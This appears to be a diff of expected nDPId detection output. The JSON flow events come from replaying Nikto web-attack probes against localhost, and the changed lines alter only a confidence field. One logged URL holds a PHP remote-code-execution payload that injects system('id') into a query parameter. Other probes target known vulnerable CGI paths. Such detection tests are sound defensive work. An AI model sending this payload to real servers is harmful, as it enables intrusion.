00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1576420277503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1576420277503,"pkt":"AAAAAAAAAAAAAAAACABFAADzlctAAEAGpjd\/AAABfwAAAcWiH5BEoK0q6pkm3YAYAED+5wAAAQEICp1m\/iedZv4nR0VUIC9mb3J1bWRpc3BsYXkucGhwP0dMT0JBTFNcW1xdPTEmZj0yJmNvbW1hPVwiLnN5c3RlbVwoJ2lkJ1wpXC5cIiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDA3MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000070)"}} 
+01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000070)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1576420277505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":1576420277505,"pkt":"AAAAAAAAAAAAAAAACABFAADNh+tAAEAGtD1\/AAABfwAAAcWkH5AZpL8K5\/crh4AYAED+wQAAAQEICp1m\/imdZv4oR0VUIC9ndWVzdGJvb2svZ3Vlc3Rib29rLmh0bWwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwNzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook\/guestbook.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000071)"}} 
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook\/guestbook.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000071)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1576420277506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420277506,"pkt":"AAAAAAAAAAAAAAAACABFAADSOPFAAEAGAzN\/AAABfwAAAcWmH5AZrAAQDbKHy4AYAED+xgAAAQEICp1m\/iqdZv4qR0VUIC9odG1sL2NnaS1iaW4vY2dpY3NvP3F1ZXJ5PUFBQSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDcyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/html\/cgi-bin\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000072)"}} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/html\/cgi-bin\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000072)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1576420277509,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277509,"pkt":"AAAAAAAAAAAAAAAACABFAADGjRRAAEAGrxt\/AAABfwAAAcWoH5A27bX0CottMYAYAED+ugAAAQEICp1m\/i2dZv4sR0VUIC9iYi1kbmJkL2ZheHN1cnZleSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE0MikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-dnbd\/faxsurvey","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000142)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-dnbd\/faxsurvey","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000142)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1576420277510,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277510,"pkt":"AAAAAAAAAAAAAAAACABFAADBP59AAEAG\/JV\/AAABfwAAAcWqH5D7oQd9r6h8pYAYAED+tQAAAQEICp1m\/i6dZv4uR0VUIC9jYXJ0Y2FydC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cartcart.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000143)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cartcart.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000143)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1576420277512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277512,"pkt":"AAAAAAAAAAAAAAAACABFAADQQ2ZAAEAG+L9\/AAABfwAAAcWsH5AIFXuH0ihJCIAYAED+xAAAAQEICp1m\/i+dZv4vR0VUIC9zY3JpcHRzL0NhcmVsbG8vQ2FyZWxsby5kbGwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/Carello\/Carello.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000144)"}} 
+01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/Carello\/Carello.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000144)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1576420277513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277513,"pkt":"AAAAAAAAAAAAAAAACABFAAC9L\/9AAEAGDDp\/AAABfwAAAcWuH5CdEhcgbNGBkoAYAED+sQAAAQEICp1m\/jGdZv4xR0VUIC93LWFnb3JhLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE4MykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/w-agora\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000183)"}} 
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/w-agora\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000183)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1576420277515,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277515,"pkt":"AAAAAAAAAAAAAAAACABFAADcMJVAAEAGC4V\/AAABfwAAAcWwH5AAUQhya1uvboAYAED+0AAAAQEICp1m\/jOdZv4zR0VUIC9jZ2ktbG9jYWwvY2dpZW1haWwtMS42L2NnaWNzbz9xdWVyeT1BQUEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 